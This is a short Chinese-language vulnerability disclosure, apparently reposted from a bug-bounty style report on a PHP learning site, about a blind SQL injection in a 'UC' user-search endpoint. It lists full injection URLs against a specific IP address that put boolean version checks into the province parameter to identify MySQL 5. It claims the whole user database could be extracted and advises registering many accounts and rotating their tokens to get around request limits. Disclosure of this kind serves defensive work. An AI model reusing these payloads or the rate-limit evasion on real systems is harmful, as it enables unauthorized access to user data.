来源:自学PHP网 时间:2015-04-17 13:02 作者: 阅读:次
[导读] 盲注,需要登录,而且不能频繁提交,没深入测试,太蛋痛漏洞证明:真做简单测试,太蛋痛了,不过这可以整个UC的库;登录UC后,抓到uid和tgt然后提交http://58.63.237.91/ucsearch/findByanot...
盲注,需要登录,而且不能频繁提交,没深入测试,太蛋痛
漏洞证明:真做简单测试,太蛋痛了,不过这可以整个UC的库; 登录UC后,抓到uid和tgt然后提交 http://58.63.237.91/ucsearch/findByanother?requid=27492*****&tgt=2edb25407a87d57d5216f80265fbb987&gender=f&age=0&isonline=1&hascamera=0&Validate=0&province=%E5%B9%BF%E4%B8%9C'%20and%20substring(@@version,1,1)=5%20and%20'1'='1 http://58.63.237.91/ucsearch/findByanother?requid=27492*****&tgt=2edb25407a87d57d5216f80265fbb987&gender=f&age=0&isonline=1&hascamera=0&Validate=0&province=%E5%B9%BF%E4%B8%9C'%20and%20substring(@@version,1,1)=4%20and%20'1'='1 据此判断出是mysql5的数据库 如果想要突破提交限制,可以注册大量的UC账号,一个账号的tgt提交三次请求,轮流提交 修复方案: 加强过滤 作者 xnet |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com